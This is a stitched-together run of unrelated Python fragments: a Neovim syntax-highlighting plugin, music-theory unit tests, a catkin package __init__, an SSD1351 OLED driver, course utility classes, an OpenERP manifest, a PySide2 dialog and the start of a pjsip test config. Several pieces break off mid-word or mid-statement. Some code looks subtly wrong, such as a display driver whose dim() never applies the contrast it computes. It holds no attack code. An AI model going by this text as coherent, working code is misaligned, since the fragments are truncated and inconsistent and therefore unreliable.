for b in self.nvim.buffers: if b.number == bufnr: # TODO what if it isn't found? 
buf = b break end = len([line for line in buf]) buf.clear_highlight(src_id=1, line_start=0, line_end=end, async=True) buf.clear_highlight(src_id=2, line_start=0, line_end=end, async=True) @neovim.function('HighlightBuffer', sync=False) def highlight_buffer(self, bufnr): # XXX some ideas to help with flickering: # use cursorholdi instead of textchangedi # still use textchangedi, but also use a timer, and if the highlight is less than X seconds old, don't recompute, just return # in insert mode, only recompute highlight groups on the line, or couple of lines surrounding the cursor # get the viewport of the current window, render that region only or first before the rest of the buffer # also, should cache a map of buffer -> lexer so this doesn't have to be done every time for b in self.nvim.buffers: if b.number == bufnr: # TODO what if it isn't found? buf = b break # TODO - can I be more intelligent than doing the whole buffer every time? just the area around a change? fullbuf = "\n".join([line for line in buf]) # TODO can i cache this somehow? self.msg(fullbuf) mylexer = pygments.lexers.guess_lexer(fullbuf) # TODO cache this # TODO these numbers need to be per buffer addid = 1 if self.srcset else 2 rmid = 2 if self.srcset else 1 self.srcset = not self.srcset arglist = [] linenum = 0 lastnewlineindex = -1 for (index, tokentype, value) in mylexer.get_tokens_unprocessed(fullbuf): self.msg("line: " + str(linenum)) self.msg("idx : " + str(index))
self.msg("lni : " + str(lastnewlineindex)) self.msg("tok : " + str(tokentype)) self.msg("val : " + str(value)) self.msg("--------") # XXX issue with highlight groups # if `:syntax off` is set from vimrc, which is the entire goal of this plugin # then a lot (maybe all) of the language specific highlight groups will never be loaded # e.g., the "Comment" hig
hlight group will probably exist (assuming the colorscheme # defines it), but "pythonComment" will not. # This isn't great, because I want to maintain the ability of users to modify individual # language highlight groups if they feel like it # I am not going to worry about this just yet, but I will need to find a way to address this eventually # For now, my solution is to just not use those language specific groups while I get the basics working # Also, it would be really swell if I didn't have to write this code for every single languages someone # might edit in vim. Actually, that's really the only way to do it. # I need to make the core functionality as generic as possible, while having an easy way to override settings # for a specific language if the generic way just won't work in all edge cases # This should be possible both within this python code, and from vimscript # entire file is sent to pygments in a single big list, so column indexes are relative to the entire file, not per line # keep track of the last index where a newline was found # the index for the 0th column for the next line will be 1 after the lastnewlineindex # at the same time, also track line numbers # TODO newlines are their own tokens in python, but not in bash, and probably other languages # I assume any language where newlines don't have semantic meaning won't have them as tokens # need to find a better way to keep track of line numbers # shit. # so i can either override each lexer that doesn't have newlines as tokens, see here: # http://pygments.org/docs/lexerdevelopment/#modifying-token-streams # or, note down the byte index of newlines in the fullbuf stream and work with that # first method might be marginally faster, but is so ugly it makes me want to cry # probably will go with second method. if value == '\n': linenum += 1 lastnewlineindex = index # self.msg('found newline') elif tokentype in self.pygmap: colstart = index - (lastnewlineindex + 1)
import unittest import logging from harmoniccontext.harmonic_context import HarmonicContext from harmoniccontext.harmonic_context_track import HarmonicContextTrack from harmonicmodel.secondary_chord_template import SecondaryChordTemplate from harmonicmodel.tertian_chord_template import TertianChordTemplate from structure.LineGrammar.core.line_grammar_executor import LineGrammarExecutor from structure.line import Line from structure.note import Note from timemodel.duration import Duration from tonalmodel.diatonic_foundation import DiatonicFoundation from tonalmodel.modality import ModalityType from tonalmodel.tonality import Tonality from transformation.reflection.t_chromatic_reflection import TChromaticReflection from misc.interval import Interval from tonalmodel.diatonic_pitch import DiatonicPitch from fractions import Fraction class TestTChromaticFlip(unittest.TestCase): logging.basicConfig(level=logging.DEBUG) def setUp(self): pass def tearDown(self): pass def test_hct_rebuild_perfect_overlap(self): print('----- test_hct_rebuild_perfect_overlap -----') line_str = '{<C-Major: I> hA:5 <:IV> B qC G <:VI> hD}' lge = LineGrammarExecutor() target_line, target_hct = lge.parse(line_str) print('--- before transformation ---') TestTChromaticFlip.print_notes(target_line) TestTChromaticFlip.print_hct(target_hct) cue = DiatonicPitch(5, 'c') f = TChromaticReflection(target_line, target_hct, cue) temporal_extent = Interval(Fraction(1, 2), Fraction(3, 2)) score_line, score_hct = f.apply(temporal_extent, cue) print('--- after transformation ---') TestTChromaticFlip.print_notes(score_line) TestTChromaticFlip.print_hct(score_hct) print('--- transformation ---') TestTChromaticFlip.print_function(f, target_hct) notes = score_line.get_all_notes() assert 'Db:4' == str(notes[1].diatonic_pitch) assert 'C:5' == str(notes[2].diatonic_pitch) assert 'F:4' == str(notes[3].diatonic_pitch) hc_list = score_hct.hc_list() assert len(hc_list) == 3 assert hc_list[1].chord.chord_template.scale_degree == 1 assert {t[0].diatonic_symbol for t in hc_list[1].chord.tones} == {'G', 'C', 'Eb'} assert hc_list[1].chord.chord_template.inversion == 3 def test_mozart(self): print('----- Mozart -----') line_str = '{<C-Major: I> hC:5 qE G <:VMaj7> q@b:4 sC:5 D <:I> hC}' lge = LineGrammarExecutor() target_line, target_hct = lge.parse(line_str) print('--- before transformation ---') TestTChromaticFlip.print_notes(target_line) TestTChromaticFlip.print_hct(target_hct) cue = Dia
tonicPitch(5, 'c') f = TChromaticReflection(target_line, target_hct, cue) score_line, score_hct = f.apply() print('--- after transformation ---') TestTChromaticFlip.print_notes(score_line) TestTChromaticFlip.print_hct(score_hct) print('--- transformation ---') TestTChromaticFlip.print_function(f, targ
et_hct) notes = score_line.get_all_notes() assert 'C:5' == str(notes[0].diatonic_pitch) assert 'Ab:4' == str(notes[1].diatonic_pitch) assert 'F:4' == str(notes[2].diatonic_pitch) assert 'Db:5' == str(notes[3].diatonic_pitch) assert 'C:5' == str(notes[4].diatonic_pitch) assert 'Bb:4' == str(notes[5].diatonic_pitch) assert 'C:5' == str(notes[6].diatonic_pitch) hc_list = score_hct.hc_list() assert len(hc_list) == 3 assert hc_list[0].chord.chord_template.scale_degree == 4 assert {t[0].diatonic_symbol for t in hc_list[0].chord.tones} == {'C', 'F', 'Ab'} assert hc_list[0].chord.chord_template.inversion == 3 assert hc_list[1].chord.chord_template.scale_degree == 7 assert {t[0].diatonic_symbol for t in hc_list[1].chord.tones} == {'F', 'Bb', 'Db', 'Gb'} assert hc_list[1].chord.chord_template.inversion == 3 assert hc_list[2].chord.chord_template.scale_degree == 4 assert {t[0].diatonic_symbol for t in hc_list[2].chord.tones} == {'C', 'F', 'Ab'} assert hc_list[2].chord.chord_template.inversion == 3 def test_secondary_chord(self): print('----- test_secondary_tonality -----') diatonic_tonality = Tonality.create(ModalityType.Major, DiatonicFoundation.get_tone("C")) chort_t_i = TertianChordTemplate.parse('tI') chord_i = chort_t_i.create_chord(diatonic_tonality) chord_v_ii = SecondaryChordTemplate.parse('V/ii').create_chord(diatonic_tonality) chord_vi_v = SecondaryChordTemplate.parse('vi/V').create_chord(diatonic_tonality) chord_t_ii = TertianChordTemplate.parse('tii') chord_ii = chord_t_ii.create_chord(diatonic_tonality) hc_track = HarmonicContextTrack() hc_track.append(HarmonicContext(diatonic_tonality, chord_i, Duration(1))) hc_track.append(HarmonicContext(diatonic_tonality, chord_v_ii, Duration(1))) hc_track.append(HarmonicContext(diatonic_tonality, chord_vi_v, Duration(1))) hc_track.append(HarmonicContext(diatonic_tonality, chord_ii, Duration(1))) TestTChromaticFlip.print_hct(hc_track) tune = [('C:5', (1, 1)), ('E:5', (1, 1)), ('E:5', (1, 1)), ('G:5', (1, 1))] line = TestTChromaticFlip.build_line(tune) cue = DiatonicPitch(5, 'd') tflip = TChromaticReflection(line, hc_track, cue) temporal_extent = Interval(Fraction(0), Fraction(4)) score_line, score_hct = tflip.apply() TestTChromaticFlip.print_notes(score_line) TestTChromaticFlip.print_hct(score_hct) @staticmethod def print_hct(hct): hcs = hct.hc_list() index = 0 for hc in hcs: print('[{0}] {1} {2}'.format(index, hc, hc.position)) index += 1 print("--------") @staticmethod def print_notes(line): for note in line.get_all_notes(): print(note) print("--------") @staticmethod def print_map(f, source_hct, cue): for hc in source_hct.hc_list(): if hc in f.hc_flip_map: pitch_map = f.hc_flip_map[hc] map_list = list() for tone in pitch_map.domain_tonality.annotation[:-1]: ft = pitch_map.tonal_function[tone] map_list.append('{0}-->{1}'.format(tone.diatonic_symbol, ft.diatonic_symbol)) print('[{0}] ({1}) {2}'.format(hc, pitch_map.range_tonality, ', '.join([s for s in map_list]))) @staticmethod def print_function(f, source_hct): for hc in source_hct.hc_list(): if hc in f.hc_flip_map: pitch_map = f.hc_flip_map[hc] domain = sorted([p for p in pitch_map.domain], key=lambda p: p.chromatic_distance) domain_tones = pitch_map.domain_tonality.annotation[:-1] map_list = list() for p in domain: r = pitch_map[p] if p.diatonic_tone in domain_tones: map_list.append('{0} --> {1}'.format(p, r)) print('[{0}] ({1}) {2}: {3}'.format(pitch_map.domain_tonality, pitch_map.cue_pitch, pitch_map.range_tonality, ', '.join([s for s in map_list]) ) ) @staticmethod def 
build_line(note_spec_list): note_list = list() for spec in note_spec_list: pitch = DiatonicPitch.parse(spec[0]) n = Note(pitch, Duration(spec[1][0], spec[1][1])) note_list.append(n) return Line(note_list)
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols

from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path

__extended_path = "/home/rss-student/rss-2014-team-3/src/robotbrain/src".split(";")
for p in reversed(__extended_path):
    sys_path.insert(0, p)
    del p
del sys_path

__path__ = extend_path(__path__, __name__)
del extend_path

__execfiles = []
for p in __extended_path:
    src_init_file = os_path.join(p, __name__ + '.py')
    if os_path.isfile(src_init_file):
        __execfiles.append(src_init_file)
    else:
        src_init_file = os_path.join(p, __name__, '__init__.py')
        if os_path.isfile(src_init_file):
            __execfiles.append(src_init_file)
    del src_init_file
    del p
del os_path
del __extended_path

for __execfile in __execfiles:
    with open(__execfile, 'r') as __fh:
        exec(__fh.read())
    del __fh
    del __execfile
del __execfiles
# Constants SSD1351_I2C_ADDRESS = 0x3C # 011110+SA0+RW - 0x3C or 0x3D SSD1351_SETCONTRAST = 0x81 SSD1351_DISPLAYALLON_RESUME = 0xA4 SSD1351_DISPLAYALLON = 0xA5 SSD1351_NORMALDISPLAY = 0xA6 SSD1351_INVERTDISPLAY = 0xA7 SSD1351_DISPLAYOFF = 0xAE SSD1351_DISPLAYON = 0xAF SSD1351_SETDISPLAYOFFSET = 0xD3 SSD1351_SETCOMPINS = 0xDA SSD1351_SETVCOMDETECT = 0xDB SSD1351_SETDISPLAYCLOCKDIV = 0xD5 SSD1351_SETPRECHARGE = 0xD9 SSD1351_SETMULTIPLEX = 0xA8 SSD1351_SETLOWCOLUMN = 0x00 SSD1351_SETHIGHCOLUMN = 0x10 SSD1351_SETSTARTLINE = 0x40 SSD1351_MEMORYMODE = 0x20 SSD1351_COLUMNADDR = 0x21 SSD1351_PAGEADDR = 0x22 SSD1351_COMSCANINC = 0xC0 SSD1351_COMSCANDEC = 0xC8 SSD1351_SEGREMAP = 0xA0 SSD1351_CHARGEPUMP = 0x8D SSD1351_EXTERNALVCC = 0x1 SSD1351_SWITCHCAPVCC = 0x2 # Scrolling constants SSD1351_ACTIVATE_SCROLL = 0x2F SSD1351_DEACTIVATE_SCROLL = 0x2E SSD1351_SET_VERTICAL_SCROLL_AREA = 0xA3 SSD1351_RIGHT_HORIZONTAL_SCROLL = 0x26 SSD1351_LEFT_HORIZONTAL_SCROLL = 0x27 SSD1351_VERTICAL_AND_RIGHT_HORIZONTAL_SCROLL = 0x29 SSD1351_VERTICAL_AND_LEFT_HORIZONTAL_SCROLL = 0x2A #? SSD1351_DELAYS_HWFILL (3) #? SSD1351_DELAYS_HWLINE (1) # SSD1351 Commands SSD1351_SETCOLUMN = 0x15 SSD1351_SETROW = 0x75 SSD1351_WRITERAM = 0x5C SSD1351_READRAM = 0x5D SSD1351_SETREMAP = 0xA0 SSD1351_STARTLINE = 0xA1 SSD1351_DISPLAYOFFSET = 0xA2 SSD1351_DISPLAYALLOFF = 0xA4 SSD1351_DISPLAYALLON = 0xA5 SSD1351_NORMALDISPLAY = 0xA6 SSD1351_INVERTDISPLAY = 0xA7 SSD1351_FUNCTIONSELECT = 0xAB SSD1351_DISPLAYOFF = 0xAE SSD1351_DISPLAYON = 0xAF SSD1351_PRECHARGE = 0xB1 SSD1351_DISPLAYENHANCE = 0xB2 SSD1351_CLOCKDIV = 0xB3 SSD1351_SETVSL = 0xB4 SSD1351_SETGPIO = 0xB5 SSD1351_PRECHARGE2 = 0xB6 SSD1351_SETGRAY = 0xB8 SSD1351_USELUT = 0xB9 SSD1351_PRECHARGELEVEL = 0xBB SSD1351_VCOMH = 0xBE SSD1351_CONTRASTABC = 0xC1 SSD1351_CONTRASTMASTER = 0xC7 SSD1351_MUXRATIO = 0xCA SSD1351_COMMANDLOCK = 0xFD SSD1351_HORIZSCROLL = 0x96 SSD1351_STOPSCROLL = 0x9E SSD1351_STARTSCROLL = 0x9F class SSD1351Base(object): """Base class for SSD1351-based OLED displays. Implementors should subclass and provide an implementation for the _initialize function. """ def __init__(self, width, height, rst, dc=None, sclk=None, din=None, cs=None, gpio=None, spi=None, i2c_bus=None, i2c_address=SSD1351_I2C_ADDRESS, i2c=None): self._log = logging.getLogger('Adafruit_SSD1351.SSD1351Base') self._spi = None self._i2c = None self.width = width self.height = height self._pages = height/8 self._buffer = [0]*(width*height) # Default to platform GPIO if not provided. self._gpio = gpio if self._gpio is None: self._gpio = GPIO.get_platform_gpio() # Setup reset pin. self._rst = rst self._gpio.setup(self._rst, GPIO.OUT) # Handle hardware SPI if spi is not None: self._log.debug('Using hardware SPI') self._spi = spi self._spi.set_clock_hz(8000000) # Handle software SPI elif sclk is not None and din is not None and cs is not None: self._log.debug('Using software SPI') self._spi = SPI.BitBang(self._gpio, sclk, din, None, cs) # Handle hardware I2C elif i2c is not None: self._log.debug('Using hardware I2C with custom I2C provider.') self._i2c = i2c.get_i2c_device(i2c_address) else: self._log.debug('Using hardware I2C with platform I2C provider.') import Adafruit_GPIO.I2C as I2C if i2c_bus is None: self._i2c = I2C.get_i2c_device(i2c_address) else: self._i2c = I2C.get_i2c_device(i2c_address, busnum=i2c_bus) # Initialize DC pin if using SPI. 
if self._spi is not None: if dc is None: raise ValueError('DC pin must be provided when using SPI.') self._dc = dc self._gpio.setup(self._dc, GPIO.OUT) def _initialize(self): raise NotImplementedError def command(self, c): """Send command byte to display.""" if self._spi is not None: # SPI write. self._gpio.set_low(self._dc) self._spi.write([c]) else: # I2C write. control = 0x00 # Co = 0, DC = 0 self._i2c.write8(control, c) def data(self, c): """Send byte of data to display.""" if self._spi is not None: # SPI write. self._gpio.set_high(self._dc) self._spi.write([c]) else: # I2C write. control = 0x40 # Co = 0, DC = 0 self._i2c.write8(control, c) def begin(self, vccstate=SSD1351_SWITCHCAPVCC): """Initialize display.""" # Save vcc state. self._vccstate = vccstate # Reset and initialize display. self.reset() self._initialize() # Turn on the display. self.command(SSD1351_DISPLAYON) def reset(self): """Reset the display.""" # Set reset high for a millisecond. self._gpio.set_high(self._rst) time.sleep(0.001) # Set reset low for 10 milliseconds. self._gpio.set_low(self._rst) time.sleep(0.010) # Set reset high again. self._gpio.set_high(self._rst) def display(self): """Write display buffer to physical display.""" self.command(SSD1351_SETCOLUMN) self.data(0) # Column start address. (0 = reset) self.data(self.width-1) # Column end address. self.command(SSD1351_SETROW) self.data(0) # Page start address. (0 = reset) self.data(self.height-1) # Page end address. # Write buffer data. if self._spi is not None: # Set DC high for data. self._gpio.set_high(self._dc) # Write buffer. self.command(SSD1351_WRITERAM) self._spi.write(self._buffer) else: for i in range(0, len(self._buffer), 16): control = 0x40 # Co = 0, DC = 0 self._i2c.writeList(control, self._buffer[i:i+16]) def image(self, image): """Set buffer to value of Python Imaging Library image. The image should be in 1 bit mode and a size equal to the display size. """ # if image.mode != '1': # raise ValueError('Image must be in mode 1.') imwidth, imheight = image.size if imwidth != self.width or imheight != self.height: raise ValueError('Image must be same dimensions as display ({0}x{1}).' \ .format(self.width, self.height)) # Grab all the pixels from the image, faster than getpixel. pix = image.load() # Iterate through the memory pages index = 0 for page in range(self.height): # Iterate through all x axis columns. for x in range(self.width): # Set the bits for the column of pixels at the current position. bits = 0 # Don't use range here as it's a bit slow for bit in [0, 1, 2, 3, 4, 5, 6, 7]: bits = bits << 1 bits |= 0 if pix[(x, page*8+7-bit)] == 0 else 1 # Update buffer byte and increment to next byte. self._buffer[index] = bits index += 1 def clear(self): """Clear contents of image buffer.""" self._buffer = [0]*(self.width*self.height) def set_contrast(self, contrast): """Sets the contr
ast of the display. Contrast
should be a value between 0 and 255.""" if contrast < 0 or contrast > 255: raise ValueError('Contrast must be a value from 0 to 255 (inclusive).') self.command(SSD1351_CONTRASTMASTER) self.command(contrast) def dim(self, dim): """Adjusts contrast to dim the display if dim is True, otherwise sets the contrast to normal brightness if dim is False. """ # Assume dim display. contrast = 0 # Adjust contrast based on VCC if not dimming. if not dim: if self._vccstate == SSD1351_EXTERNALVCC: contrast = 0x9F else: contrast = 0xCF def invert(self): self.command(SSD1351_NORMALDISPLAY) def rawfill(self, x, y, w, h, fillcolor): if (x >= self.width) or (y >= self.height): return if y+h > self.height: h = self.height-y-1 if x+w > self.width: w = self.width-x-1 self.command(SSD1351_SETCOLUMN) self.data(x) self.data(x+w-1) self.command(SSD1351_SETROW) self.data(y) self.data(y+h-1) #fill! self.command(SSD1351_WRITERAM) for num in range (0, w*h): self.data(fillcolor >> 8) self.data(fillcolor) def color565(self, r, g, b): c = r >> 3 c <<= 6 c |= g >> 2 c <<= 5 c |= b >> 3 return c def roughimage(self, image): self.command(SSD1351_SETCOLUMN) self.data(0) self.data(self.width - 1) self.command(SSD1351_SETROW) self.data(0) self.data(self.height-1) #fill im_width, im_height = image.size print(im_width, im_height) rgb_image = image.convert('RGB') pix = rg
+= 1 def pop(self): (_, _, item) = heapq.heappop(self.heap) # (_, item) = heapq.heappop(self.heap) return item def isEmpty(self): return len(self.heap) == 0 class PriorityQueueWithFunction(PriorityQueue): """ Implements a priority queue with the same push/pop signature of the Queue and the Stack classes. This is designed for drop-in replacement for those two classes. The caller has to provide a priority function, which extracts each item's priority. """ def __init__(self, priorityFunction): "priorityFunction (item) -> priority" self.priorityFunction = priorityFunction # store the priority function PriorityQueue.__init__(self) # super-class initializer def push(self, item): "Adds an item to the queue with priority from the priority function" PriorityQueue.push(self, item, self.priorityFunction(item)) def manhattanDistance( xy1, xy2 ): "Returns the Manhattan distance between points xy1 and xy2" return abs( xy1[0] - xy2[0] ) + abs( xy1[1] - xy2[1] ) """ Data structures and functions useful for various course projects The search project should not need anything below this line. """ class Counter(dict): """ A counter keeps track of counts for a set of keys. The counter class is an extension of the standard python dictionary type. It is specialized to have number values (integers or floats), and includes a handful of additional functions to ease the task of counting data. In particular, all keys are defaulted to have value 0. Using a dictionary: a = {} print a['test'] would give an error, while the Counter class analogue: >>> a = Counter() >>> print a['test'] 0 returns the default 0 value. Note that to reference a key that you know is contained in the counter, you can still use the dictionary syntax: >>> a = Counter() >>> a['test'] = 2 >>> print a['test'] 2 This is very useful for counting things without initializing their counts, see for example: >>> a['blah'] += 1 >>> print a['blah'] 1 The counter also includes additional functionality useful in implementing the classifiers for this assignment. Two counters can be added, subtracted or multiplied together. See below for details. They can also be normalized and their total count and arg max can be extracted. """ def __getitem__(self, idx): self.setdefault(idx, 0) return dict.__getitem__(self, idx) def incrementAll(self, keys, count): """ Increments all elements of keys by the same count. >>> a = Counter() >>> a.incrementAll(['one','two', 'three'], 1) >>> a['one'] 1 >>> a['two'] 1 """ for key in keys: self[key] += count def argMax(self): """ Returns the key with the highest value. """ if len(self.keys()) == 0: return None all = self.items() values = [x[1] for x in all] maxIndex = values.index(max(values)) return all[maxIndex][0] def sortedKeys(self): """ Returns a list of keys sorted by their values. Keys with the highest values will appear first. >>> a = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> a['third'] = 1 >>> a.sortedKeys() ['second', 'third', 'first'] """ sortedItems = self.items() compare = lambda x, y: sign(y[1] - x[1]) sortedItems.sort(cmp=compare) return [x[0] for x in sortedItems] def totalCount(self): """ Returns the sum of counts for all keys. """ return sum(self.values()) def normalize(self): """ Edits the counter such that the total count of all keys sums to 1. The ratio of counts for all keys will remain the same. Note that normalizing an empty Counter will result in an error. 
""" total = float(self.totalCount()) if total == 0: return for key in self.keys(): self[key] = self[key] / total def divideAll(self, divisor): """ Divides all counts by divisor """ divisor = float(divisor) for key in self: self[key] /= divisor def copy(self): """ Returns a copy of the counter """ return Counter(dict.copy(self)) def __mul__(self, y ): """ Multiplying two counters gives the dot product of their vectors where each unique label is a vector element. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['second'] = 5 >>> a['third'] = 1.5 >>> a['fourth'] = 2.5 >>> a * b 14 """ sum = 0 x = self if len(x) > len(y): x,y = y,x for key in x: if key not in y: continue sum += x[key] * y[key] return sum def __radd__(self, y): """ Adding another counter to a counter increments the current counter by the values stored in the second counter. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> a += b >>> a['first'] 1 """ for key, value in y.items(): self[key] += value def __add__( self, y ): """ Adding two counters gives a counter with the union of all keys and counts of the second added to counts of the first. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> (a + b)['first'] 1 """ addend = Counter() for key in self: if key in y: addend[key] = self[key] + y[key] else: addend[key] = self[key] for key in y: if key in self: continue addend[key] = y[key] return addend def __sub__( self, y ): """ Subtracting a counter from another gives a counter with the union of all keys and counts of the second subtracted from counts of the first. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> (a - b)['first'] -5 """ addend = Counter() for key in self: if key in y: addend[key] = self[key] - y[key] else: addend[key] = self[key] for key in y: if key in self: continue addend[key] = -1 * y[key] return addend def raiseNotDefined(): fileName = inspect.stack()[1][1] line = inspect.stack()[1][2] method = inspect.stack()[1][3] print "*** Method
not implemented: %s at line %s of %s" % (method, line, fileName) sys.exit(1) def normalize(vectorOrCounter): """ normalize a vector or counter by dividing each value by the sum of all values """ normalizedCounter = Counter() if type(vectorOrCounter) == type(normalizedCounter): counter = vectorOrCounter total = float(counter.totalCount()) if total == 0: return counter for key in counter.keys():
value = counter[key] normalizedCounter[key] = value / total return normalizedCounter else: vector = vectorOrCounter s = float(sum(vector)) if s == 0: return vector return [el / s for el in vector] def nSample(distribution, values, n): if sum(distribution) != 1: distribution = normalize(distribution) rand = [random.random() for i in range(n)] rand.sort() samples = [] samplePos, distPos,
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warr
anty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Attendances', 'version': '1.1', 'category': 'Human Resour
ces',
    'description': """
This module manages employee attendances.
==========================================
Keeps track of employee attendance based on the Sign in/Sign out actions they
perform.
    """,
    'author': 'OpenERP SA',
    'images': ['images/hr_attendances.jpeg'],
    'depends': ['hr'],
    'data': [
        'security/ir_rule.xml',
        'security/ir.model.access.csv',
        'hr_attendance_view.xml',
        'hr_attendance_report.xml',
        'wizard/hr_attendance_bymonth_view.xml',
        'wizard/hr_attendance_byweek_view.xml',
        'wizard/hr_attendance_error_view.xml',
        'res_config_view.xml',
    ],
    'demo': ['hr_attendance_demo.xml'],
    'test': [
        'test/attendance_process.yml',
        'test/hr_attendance_report.yml',
    ],
    'installable': True,
    'auto_install': False,
    #web
    "js": ["static/src/js/attendance.js"],
    'qweb': ["static/src/xml/attendance.xml"],
    'css': ["static/src/css/slider.css"],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'replace_with_ref_dialog_ui.ui' # # Created: Fri Nov 18 22:58:33 2016 # by: pyside2-uic running on PySide2 2.0.0~alpha0 # # WARNING! All changes made in this file will be lost! from PySide2 import QtCore, QtGui, QtWidgets class Ui_Dialog(object): def setupUi(self, Dialog): Dialog.setObjectName("Dialog") Dialog.resize(520, 174) self.verticalLayout = QtWidgets.QVBoxLayout(Dialog) self.verticalLayout.setContentsMargins(6, 6, 6, 6) self.verticalLayout.setObjectName("verticalLayout") self.groupBox = QtWidgets.QGroupBox(Dialog) self.groupBox.setTitle("") self.groupBox.setObjectName("groupBox") self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox) self.horizontalLayout.setObjectName("horizontalLayout") self.uiLBL_text = QtWidgets.QLabel(self.groupBox) self.uiLBL_text.setTextFormat(QtCore.Qt.RichText) self.uiLBL_text.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop) self.uiLBL_text.setWordWrap(True) self.uiLBL_text.setObjectName("uiLBL_text")
self.horizontalLayout.addWidget(self.uiLBL_text) self.verticalLayout.addWidget(self.groupBox) self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalL
ayout_2.addItem(spacerItem) self.uiBTN_saveReplace = QtWidgets.QPushButton(Dialog) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.uiBTN_saveReplace.sizePolicy().hasHeightForWidth()) self.uiBTN_saveReplace.setSizePolicy(sizePolicy) self.uiBTN_saveReplace.setObjectName("uiBTN_saveReplace") self.horizontalLayout_2.addWidget(self.uiBTN_saveReplace) self.uiBTN_replace = QtWidgets.QPushButton(Dialog) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.uiBTN_replace.sizePolicy().hasHeightForWidth()) self.uiBTN_replace.setSizePolicy(sizePolicy) self.uiBTN_replace.setObjectName("uiBTN_replace") self.horizontalLayout_2.addWidget(self.uiBTN_replace) self.uiBTN_cancel = QtWidgets.QPushButton(Dialog) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.uiBTN_cancel.sizePolicy().hasHeightForWidth()) self.uiBTN_cancel.setSizePolicy(sizePolicy) self.uiBTN_cancel.setObjectName("uiBTN_cancel") self.horizontalLayout_2.addWidget(self.uiBTN_cancel) spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_2.addItem(spacerItem1) self.horizontalLayout_2.setStretch(1, 1) self.horizontalLayout_2.setStretch(2, 1) self.horizontalLayout_2.setStretch(3, 1) self.verticalLayout.addLayout(self.horizontalLayout_2) self.verticalLayout.setStretch(0, 1) self.retranslateUi(Dialog) QtCore.QObject.connect(self.uiBTN_saveReplace, QtCore.SIGNAL("clicked()"), Dialog.onSaveReplaceClicked) QtCore.QObject.connect(self.uiBTN_replace, QtCore.SIGNAL("clicked()"), Dialog.onReplaceClicked) QtCore.QObject.connect(self.uiBTN_cancel, QtCore.SIGNAL("clicked()"), Dialog.onCancelClicked) QtCore.QObject.connect(Dialog, QtCore.SIGNAL("finished(int)"), Dialog.onDialogFinished) QtCore.QMetaObject.connectSlotsByName(Dialog) def retranslateUi(self, Dialog): Dialog.setWindowTitle(QtWidgets.QApplication.translate("Dialog", "Replace With Reference", None, -1)) self.uiLBL_text.setText(QtWidgets.QApplication.translate("Dialog", "Text", None, -1)) self.uiBTN_saveReplace.setText(QtWidgets.QApplication.translate("Dialog", "Save and Replace", None, -1)) self.uiBTN_replace.setText(QtWidgets.QApplication.translate("Dialog", "Replace", None, -1)) self.uiBTN_cancel.setText(QtWidgets.QApplication.translate("Dialog", "Cancel", None, -1))
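# --- Hedged usage sketch (not part of the generated file above) ----------------
# The generated Ui_Dialog only builds the widgets and wires its buttons to slots
# named onSaveReplaceClicked / onReplaceClicked / onCancelClicked /
# onDialogFinished on whatever dialog setupUi() is applied to.  A minimal host
# dialog could look like the sketch below; the class name and the accept/reject
# choices are illustrative assumptions, and the sketch assumes it lives in the
# same module as (or imports) Ui_Dialog.
from PySide2 import QtWidgets


class ReplaceWithRefDialog(QtWidgets.QDialog):
    def __init__(self, parent=None):
        super(ReplaceWithRefDialog, self).__init__(parent)
        self.ui = Ui_Dialog()
        self.ui.setupUi(self)  # builds widgets and connects the button signals

    # Slots expected by the connect() calls made in setupUi()
    def onSaveReplaceClicked(self):
        self.accept()

    def onReplaceClicked(self):
        self.accept()

    def onCancelClicked(self):
        self.reject()

    def onDialogFinished(self, result):
        pass  # cleanup hook; receives the dialog result code


if __name__ == "__main__":
    app = QtWidgets.QApplication([])
    dialog = ReplaceWithRefDialog()
    dialog.exec_()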
# $Id: 201_codec_l16_160
00.py 369517 2012-07-01 17:28:57Z file $ # from inc_cfg import * # Call with L16/16000/1 codec test_param = TestParam
